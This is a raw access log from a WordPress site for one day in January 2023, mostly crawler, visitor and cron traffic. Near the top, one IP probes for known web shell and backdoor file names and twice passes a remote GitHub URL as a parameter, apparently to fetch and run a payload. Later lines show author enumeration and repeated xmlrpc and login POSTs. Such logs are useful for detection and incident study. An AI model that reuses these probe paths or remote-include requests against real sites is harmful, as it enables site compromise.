104.46.116.53 - - [08/Jan/2023:07:10:08 -0800] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
104.46.116.53 - - [08/Jan/2023:07:10:12 -0800] "GET /wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
104.46.116.53 - - [08/Jan/2023:07:10:14 -0800] "GET /th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
104.46.116.53 - - [08/Jan/2023:07:10:18 -0800] "GET /cindex.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
104.46.116.53 - - [08/Jan/2023:07:10:19 -0800] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
104.46.116.53 - - [08/Jan/2023:07:10:20 -0800] "GET /wp-1ogin_bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
104.46.116.53 - - [08/Jan/2023:07:10:21 -0800] "GET /wp-includes/fonts/css.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
104.46.116.53 - - [08/Jan/2023:07:10:25 -0800] "GET /config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
104.46.116.53 - - [08/Jan/2023:07:10:29 -0800] "GET /wp-content/themes/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
104.46.116.53 - - [08/Jan/2023:07:10:34 -0800] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
104.46.116.53 - - [08/Jan/2023:07:10:35 -0800] "GET /haders.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
104.46.116.53 - - [08/Jan/2023:07:10:38 -0800] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
104.46.116.53 - - [08/Jan/2023:07:10:40 -0800] "GET /wp-includes/small.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
104.46.116.53 - - [08/Jan/2023:07:10:43 -0800] "GET /test.php?Ghost=send HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
51.222.253.10 - - [08/Jan/2023:07:19:33 -0800] "GET /robots.txt HTTP/1.1" 200 58 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "gatipackers.com"
51.222.253.16 - - [08/Jan/2023:07:19:34 -0800] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 26248 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "gatipackers.com"
51.222.253.7 - - [08/Jan/2023:07:19:40 -0800] "GET /wp-content/themes/twentynineteen/print.css?ver=1.1 HTTP/1.1" 200 1230 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "gatipackers.com"
51.222.253.20 - - [08/Jan/2023:07:19:41 -0800] "GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1" 200 189 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "gatipackers.com"
51.222.253.5 - - [08/Jan/2023:07:19:41 -0800] "GET /wp-includes/css/dist/block-library/style.min.css?ver=6.1.1 HTTP/1.1" 200 12518 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "gatipackers.com"
104.244.75.33 - - [08/Jan/2023:07:24:42 -0800] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42" "gatipackers.com"
104.244.75.33 - - [08/Jan/2023:07:24:43 -0800] "GET / HTTP/1.1" 200 26864 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42" "gatipackers.com"
10.213.116.211 - - [08/Jan/2023:07:24:47 -0800] "POST /wp-cron.php?doing_wp_cron=1673191487.3276200294494628906250 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673191487.3276200294494628906250" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
104.192.3.74 - - [08/Jan/2023:07:24:51 -0800] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 26215 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42" "gatipackers.com"
185.220.101.51 - - [08/Jan/2023:07:25:25 -0800] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
185.220.101.51 - - [08/Jan/2023:07:25:27 -0800] "GET / HTTP/1.1" 200 26864 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
185.220.101.51 - - [08/Jan/2023:07:25:31 -0800] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 26215 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
20.108.4.15 - - [08/Jan/2023:07:35:32 -0800] "GET /wp-admin/css/ HTTP/1.1" 200 144 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
213.175.66.138 - - [08/Jan/2023:07:36:16 -0800] "POST /wp-login.php HTTP/1.1" 200 6922 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36" "gatipackers.com"
196.244.191.158 - - [08/Jan/2023:07:45:30 -0800] "GET /?author=1 HTTP/1.1" 200 26590 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
10.213.116.210 - - [08/Jan/2023:07:45:34 -0800] "POST /wp-cron.php?doing_wp_cron=1673192734.7463240623474121093750 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673192734.7463240623474121093750" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
196.244.191.158 - - [08/Jan/2023:07:45:36 -0800] "POST /xmlrpc.php HTTP/1.1" 200 403 "http://gatipackers.com/xmlrpc.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
172.251.52.160 - - [08/Jan/2023:07:46:37 -0800] "GET / HTTP/1.1" 200 26917 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" "www.gatipackers.com"
196.244.191.158 - - [08/Jan/2023:07:47:08 -0800] "GET /?author=1 HTTP/1.1" 200 26590 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
196.244.191.158 - - [08/Jan/2023:07:47:13 -0800] "GET /wp-json/wp/v2/users/ HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
118.184.177.45 - - [08/Jan/2023:07:50:14 -0800] "GET / HTTP/1.1" 200 26945 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.gatipackers.com"
114.119.153.208 - - [08/Jan/2023:07:58:47 -0800] "GET /wp-content?C=D%3BO%3DA HTTP/1.1" 301 1428 "https://www.gatipackers.com/wp-content?C=M%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.gatipackers.com"
114.119.153.208 - - [08/Jan/2023:07:58:59 -0800] "GET /wp-content/?C=D%3BO%3DA HTTP/1.1" 200 - "https://www.gatipackers.com/wp-content?C=M%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.gatipackers.com"
40.84.151.147 - - [08/Jan/2023:08:05:47 -0800] "GET / HTTP/1.1" 200 26864 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "gatipackers.com"
40.84.151.147 - - [08/Jan/2023:08:05:53 -0800] "GET /wp-includes/ID3/license.txt HTTP/1.1" 200 1361 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "gatipackers.com"
40.84.151.147 - - [08/Jan/2023:08:05:53 -0800] "GET /feed/ HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "gatipackers.com"
40.84.151.147 - - [08/Jan/2023:08:05:53 -0800] "GET /xmlrpc.php?rsd HTTP/1.1" 500 4947 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "gatipackers.com"
10.213.116.209 - - [08/Jan/2023:08:05:51 -0800] "POST /wp-cron.php?doing_wp_cron=1673193951.4481520652770996093750 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673193951.4481520652770996093750" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
40.84.151.147 - - [08/Jan/2023:08:05:53 -0800] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "gatipackers.com"
40.84.151.147 - - [08/Jan/2023:08:05:53 -0800] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "gatipackers.com"
40.84.151.147 - - [08/Jan/2023:08:05:54 -0800] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "gatipackers.com"
40.84.151.147 - - [08/Jan/2023:08:05:54 -0800] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "gatipackers.com"
40.84.151.147 - - [08/Jan/2023:08:05:54 -0800] "GET /2021/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "gatipackers.com"
40.84.151.147 - - [08/Jan/2023:08:05:54 -0800] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "gatipackers.com"
40.84.151.147 - - [08/Jan/2023:08:05:54 -0800] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "gatipackers.com"
40.84.151.147 - - [08/Jan/2023:08:05:54 -0800] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "gatipackers.com"
40.84.151.147 - - [08/Jan/2023:08:05:54 -0800] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "gatipackers.com"
40.84.151.147 - - [08/Jan/2023:08:05:54 -0800] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "gatipackers.com"
3.248.215.215 - - [08/Jan/2023:08:15:34 -0800] "GET /robots.txt HTTP/1.1" 200 58 "-" "Pandalytics/1.0 (https://domainsbot.com/pandalytics/)" "gatipackers.com"
3.248.215.215 - - [08/Jan/2023:08:15:35 -0800] "GET / HTTP/1.1" 200 26864 "-" "Pandalytics/1.0 (https://domainsbot.com/pandalytics/)" "gatipackers.com"
10.213.116.211 - - [08/Jan/2023:08:15:39 -0800] "POST /wp-cron.php?doing_wp_cron=1673194539.8308930397033691406250 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673194539.8308930397033691406250" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
123.125.109.135 - - [08/Jan/2023:08:26:19 -0800] "GET / HTTP/1.1" 200 26917 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.gatipackers.com"
10.213.116.211 - - [08/Jan/2023:08:26:22 -0800] "POST /wp-cron.php?doing_wp_cron=1673195182.8960349559783935546875 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673195182.8960349559783935546875" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
196.244.191.14 - - [08/Jan/2023:08:26:55 -0800] "GET /?author=1 HTTP/1.1" 200 26590 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
82.118.29.179 - - [08/Jan/2023:08:28:25 -0800] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42" "gatipackers.com"
82.118.29.179 - - [08/Jan/2023:08:28:26 -0800] "GET / HTTP/1.1" 200 26864 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42" "gatipackers.com"
82.118.29.179 - - [08/Jan/2023:08:28:31 -0800] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 26215 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42" "gatipackers.com"
161.35.15.73 - - [08/Jan/2023:08:43:02 -0800] "GET /wp-login.php HTTP/1.1" 200 6555 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
161.35.15.73 - - [08/Jan/2023:08:43:08 -0800] "GET //wp-json/wp/v2/users/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
10.213.116.210 - - [08/Jan/2023:08:43:06 -0800] "POST /wp-cron.php?doing_wp_cron=1673196186.7525949478149414062500 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673196186.7525949478149414062500" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
193.56.113.24 - - [08/Jan/2023:09:02:23 -0800] "GET /?author=1 HTTP/1.1" 200 26590 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
193.56.113.24 - - [08/Jan/2023:09:02:29 -0800] "GET /wp-json/wp/v2/users/ HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
10.213.116.209 - - [08/Jan/2023:09:02:27 -0800] "POST /wp-cron.php?doing_wp_cron=1673197347.1568601131439208984375 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673197347.1568601131439208984375" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
193.56.113.24 - - [08/Jan/2023:09:02:29 -0800] "GET /wp-login.php HTTP/1.1" 200 6547 "http://gatipackers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
193.56.113.24 - - [08/Jan/2023:09:02:33 -0800] "POST /wp-login.php HTTP/1.1" 200 6947 "http://gatipackers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
114.119.141.152 - - [08/Jan/2023:09:05:49 -0800] "GET /robots.txt HTTP/1.1" 200 58 "https://gatipackers.com?C=S%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "gatipackers.com"
82.118.29.187 - - [08/Jan/2023:09:12:50 -0800] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.86 Safari/537.36" "gatipackers.com"
82.118.29.187 - - [08/Jan/2023:09:12:51 -0800] "GET / HTTP/1.1" 200 26864 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.86 Safari/537.36" "gatipackers.com"
10.213.116.209 - - [08/Jan/2023:09:12:54 -0800] "POST /wp-cron.php?doing_wp_cron=1673197974.9494481086730957031250 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673197974.9494481086730957031250" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
82.118.29.187 - - [08/Jan/2023:09:12:57 -0800] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 26215 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.86 Safari/537.36" "gatipackers.com"
193.56.113.29 - - [08/Jan/2023:09:15:14 -0800] "GET /?author=1 HTTP/1.1" 200 26590 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
193.56.113.29 - - [08/Jan/2023:09:15:17 -0800] "GET /wp-json/wp/v2/users/ HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
196.244.191.70 - - [08/Jan/2023:09:55:39 -0800] "GET /?author=1 HTTP/1.1" 200 26590 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
10.213.116.210 - - [08/Jan/2023:09:55:43 -0800] "POST /wp-cron.php?doing_wp_cron=1673200543.1528079509735107421875 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673200543.1528079509735107421875" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
196.244.192.198 - - [08/Jan/2023:10:12:50 -0800] "GET /?author=1 HTTP/1.1" 200 26590 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
10.213.116.211 - - [08/Jan/2023:10:12:54 -0800] "POST /wp-cron.php?doing_wp_cron=1673201574.6757299900054931640625 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673201574.6757299900054931640625" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
196.244.192.198 - - [08/Jan/2023:10:12:56 -0800] "POST /xmlrpc.php HTTP/1.1" 200 403 "http://gatipackers.com/xmlrpc.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
40.77.167.8 - - [08/Jan/2023:10:23:00 -0800] "GET /robots.txt HTTP/1.1" 200 58 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "www.gatipackers.com"
157.55.39.118 - - [08/Jan/2023:10:23:10 -0800] "GET / HTTP/1.1" 200 26917 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.gatipackers.com"
10.213.116.211 - - [08/Jan/2023:10:23:18 -0800] "POST /wp-cron.php?doing_wp_cron=1673202198.4166231155395507812500 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673202198.4166231155395507812500" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
54.36.148.212 - - [08/Jan/2023:10:23:37 -0800] "GET /robots.txt HTTP/1.1" 200 58 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "gatipackers.com"
51.222.253.2 - - [08/Jan/2023:10:23:38 -0800] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 26215 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "gatipackers.com"
40.77.167.51 - - [08/Jan/2023:10:28:52 -0800] "GET /online_quote HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.gatipackers.com"
72.9.158.112 - - [08/Jan/2023:10:30:17 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
185.197.195.173 - - [08/Jan/2023:10:37:29 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
10.213.116.211 - - [08/Jan/2023:10:37:40 -0800] "POST /wp-cron.php?doing_wp_cron=1673203060.1093130111694335937500 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673203060.1093130111694335937500" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
91.146.105.202 - - [08/Jan/2023:10:44:27 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
196.244.191.110 - - [08/Jan/2023:10:47:15 -0800] "GET /?author=1 HTTP/1.1" 200 26590 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
196.244.191.110 - - [08/Jan/2023:10:47:19 -0800] "GET /wp-json/wp/v2/users/ HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
103.74.120.192 - - [08/Jan/2023:10:51:23 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
157.55.39.64 - - [08/Jan/2023:10:56:59 -0800] "GET /wp-includes/css/dist/block-library/style.min.css?ver=6.1.1 HTTP/1.1" 200 12518 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "gatipackers.com"
161.35.68.167 - - [08/Jan/2023:10:58:44 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
10.213.116.209 - - [08/Jan/2023:10:58:48 -0800] "POST /wp-cron.php?doing_wp_cron=1673204328.5964589118957519531250 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673204328.5964589118957519531250" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
103.171.181.149 - - [08/Jan/2023:11:06:32 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
40.77.190.102 - - [08/Jan/2023:11:12:52 -0800] "GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1" 200 189 "http://www.gatipackers.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" "gatipackers.com"
40.77.190.102 - - [08/Jan/2023:11:12:52 -0800] "GET /wp-content/themes/twentynineteen/print.css?ver=1.1 HTTP/1.1" 200 1230 "http://www.gatipackers.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" "gatipackers.com"
